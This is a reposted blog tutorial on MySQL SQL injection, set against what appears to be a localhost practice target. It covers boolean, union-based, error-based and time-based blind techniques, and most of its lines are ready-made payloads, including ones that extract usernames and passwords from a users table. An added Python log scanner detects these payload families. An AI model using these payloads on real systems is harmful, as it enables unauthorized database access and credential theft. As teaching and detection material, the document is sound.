SQL Injection: the SQL injection workflow
2020-03-20 10:19:53
1. Determine whether an injection point exists
- and 1=1
- and 1=2
- and 3-2=1
- and 3-1=1
- ' " ) ') ") ')) ")) ` : try each closing sequence and watch for the one that makes the page behave abnormally
- ' and 1=1 -- -
- ' and 1=2 -- -
- ' and 3-2=1 -- -
- ' and 3-1=1 -- -
- Determine the number of columns
- sql.php?id=1 order by 1,2,3,4
- As long as the column number given to order by is not greater than the number of columns in the query, the statement executes normally; once it is greater than that number, the statement errors out.
- union select 1,2,3
- 2 and 3 are visible in the page output, which confirms that these two positions are echoed back.
- union select 1,version(),database()
2. Union injection
- union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'
- union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'
- union select 1,group_concat(username),group_concat(password) from users
3. Error-based injection
- http://localhost/sql-1.php?id=-1 and updatexml(1,concat(0x7e,database()),1)
- http://localhost/sql-1.php?id=-1 and updatexml(1,concat(0x7e,(select substring(group_concat(schema_name),21,20) from information_schema.schemata)),1)
- http://localhost/sql-1.php?id=-1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)
- http://localhost/sql-1.php?id=-1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)
- http://localhost/sql-1.php?id=-1 and updatexml(1,concat(0x7e,(select group_concat(concat_ws(0x7e,username,password)) from security.users)),1)
4. Blind injection via error messages
- 2. extractvalue(arg1,arg2): returns, from the target XML, a string containing the queried value. arg1 is a String, the name of the XML document object; arg2 is a string in XPath format.
- Statement: select extractvalue(1,concat(0x7e,(select user()),0x7e))
- Result: XPATH syntax error: '~root@localhost~
- 3. updatexml(arg1,arg2,arg3): changes the value of the nodes in the document that match a condition. arg1 is the name of the XML document object, arg2 is a string in XPath format, and arg3 is a String that replaces the matched data.
- Statement: select updatexml(1,concat(0x7e,(select user()),0x7e),1)
- Result: XPATH syntax error: '~root@localhost~
- 4. floor(arg1): returns only the integer part of arg1; the fractional part is discarded.
- Statement: select 1,(select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a),3
- Result: Duplicate entry 'root@localhost1' for key 'group_key'
- 5. extractvalue() / updatexml()
- 1' and extractvalue(1,concat(0x7e,(select database()),0x7e))#
- 1' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e))#
5. Time-based injection
- benchmark(arg1,arg2): arg1 is the function to run, arg2 is the number of times to run it
- Statement: select if(1=1, benchmark(5000000,md5('abc')), 'goodbye')
- Result: the page is delayed by 2 seconds
- sleep(arg1): arg1 is the pause duration in seconds.
- Statement: select if(1=1, sleep(3), 'goodbye')
- Result: the page is delayed by 3 seconds
- and if((length(database()))>5,sleep(5),0)
- and (length(database()))>5
- and (length(database()))=4
- and (ascii(substr(database(),n,1)))>100
- and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))>100
- and (ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)))>100
- and (ascii(substr((select password from users limit 0,1),1,1)))=68
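As an added defensive example (not from the original post): a small Python scanner that flags, in the decoded query parameters of web access-log lines, the payload families walked through in sections 1 to 5 (boolean probes, order by, union select, updatexml/extractvalue, floor(rand()), sleep/benchmark, ascii(substr()), information_schema enumeration). The log lines, the client address and the sql.php / sql-1.php paths are constructed samples; the patterns are a starting point and need tuning against real traffic.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Payload families from the injection workflow walked through on this page
SIGNATURES = {
    "boolean_probe": re.compile(r"\band\s+\d+\s*[-=]\s*\d+", re.I),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_based": re.compile(r"\bunion\s+select\b", re.I),
    "error_based": re.compile(r"\b(?:updatexml|extractvalue)\s*\(", re.I),
    "floor_rand": re.compile(r"\bfloor\s*\(\s*rand\s*\(", re.I),
    "time_based": re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I),
    "blind_char": re.compile(r"\bascii\s*\(\s*substr\s*\(", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.(?:tables|columns|schemata)\b", re.I),
}
# Request line inside a common/combined-format access-log entry
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

def classify_request(url):
    """Return the sorted payload families found in any decoded query value
    of `url`; an empty list means no known family matched."""
    found = set()
    for _, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        for family, pattern in SIGNATURES.items():
            if pattern.search(value):
                found.add(family)
    return sorted(found)

def scan_log(text):
    """Return (line_number, url, families) for each log line whose request
    matches at least one family; lines without a request line are skipped."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        match = REQUEST_RE.search(line)
        if match:
            families = classify_request(match.group(1))
            if families:
                hits.append((number, match.group(1), families))
    return hits

# Constructed sample log lines (not from a real server) mirroring the
# page's sql.php / sql-1.php probes; line 1 is a benign request
SAMPLE_LOG = """\
10.0.0.5 - - [20/Mar/2020:10:19:53 +0800] "GET /sql.php?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [20/Mar/2020:10:20:01 +0800] "GET /sql.php?id=1%20and%201%3D2 HTTP/1.1" 200 0
10.0.0.5 - - [20/Mar/2020:10:20:08 +0800] "GET /sql.php?id=1%20order%20by%204 HTTP/1.1" 500 0
10.0.0.5 - - [20/Mar/2020:10:20:15 +0800] "GET /sql.php?id=-1%20union%20select%201,version(),database() HTTP/1.1" 200 640
10.0.0.5 - - [20/Mar/2020:10:20:22 +0800] "GET /sql-1.php?id=-1%20and%20updatexml(1,concat(0x7e,database()),1) HTTP/1.1" 500 0
10.0.0.5 - - [20/Mar/2020:10:20:30 +0800] "GET /sql.php?id=1%20and%20if(length(database())%3E5,sleep(5),0) HTTP/1.1" 200 512
"""
```

Running `scan_log(SAMPLE_LOG)` returns one tuple per flagged line (lines 2 to 6 of the sample) with the family that matched, which is the kind of signal worth correlating with 500 responses and slow responses from the same client.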
6. Gathering database information
7. Cracking the data
8. Privilege escalation
9. Internal network penetration
Reposted from blog.csdn.net/cldimd/article/details/104970395